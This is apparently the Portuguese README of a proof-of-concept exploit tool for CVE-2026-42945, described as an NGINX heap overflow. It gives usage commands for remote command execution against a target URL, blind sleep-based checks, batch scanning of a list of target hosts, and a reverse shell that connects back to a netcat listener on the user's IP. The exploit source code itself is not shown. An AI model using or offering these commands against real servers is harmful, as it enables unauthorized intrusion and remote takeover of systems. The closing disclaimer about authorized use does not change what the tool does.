
Prova de conceito de exploit para CVE-2026-42945 (NGINX Rift) com RCE multi-modo, verificação cega, reverse shell e capacidades de varredura em lote para pesquisa de segurança autorizada.
Uma ferramenta profissional de Prova de Conceito (PoC) para pesquisar e identificar a vulnerabilidade NGINX Rift, um estouro de buffer crítico baseado em heap no ngx_http_rewrite_module.
python3 poc.py --url http://target.com --method id
Crie um arquivo chamado targets.txt com uma URL por linha:
http://1.2.3.4
https://docs.company.com
http://server.internal:8080
Em seguida, execute:
python3 poc.py --list targets.txt --method sleep
python3 poc.py --url http://target.com --cmd "whoami" --verbose
Inicie seu listener primeiro: nc -lvp 1337
python3 poc.py --url http://target.com --method shell --listen-ip [YOUR_IP] --listen-port 1337
Esta ferramenta é apenas para fins educacionais e auditoria de segurança autorizada. O autor não é responsável por qualquer uso indevido ou dano causado por este script. Sempre obtenha permissão explícita antes de testar contra qualquer infraestrutura.